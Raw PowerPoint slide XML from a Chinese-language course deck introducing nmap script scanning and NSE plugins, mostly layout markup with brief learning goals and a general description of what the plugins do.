              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4592955" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.3.1 namp脚本介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7602220" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.能够了解脚本扫描基础知识。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.能够熟记namp脚本命令参数。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4592955" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.3.1 namp脚本介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:t>本项目介绍nmap工具的脚本扫描基本命令和参数，为扫描实践作准备。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4592955" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.3.1 namp脚本介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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a:xfrm>
            <a:off x="5554701" y="1118051"/>
            <a:ext cx="5442585" cy="2500630"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="5442585" cy="2500630"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086296"/>
              <a:ext cx="4777105" cy="2168525"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 虽然nmap的功能已经很强大，但是在某些情况下仍需要反复扫描才能够探测到服务器的信息，这时候就需要NSE 插件实现这个功能。NSE 插件能够完成网络发现、复杂版本探测、脆弱性探测、简单漏洞利用等功能。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="1541145" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr dirty="0">
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>NSE插件简介</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4592955" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
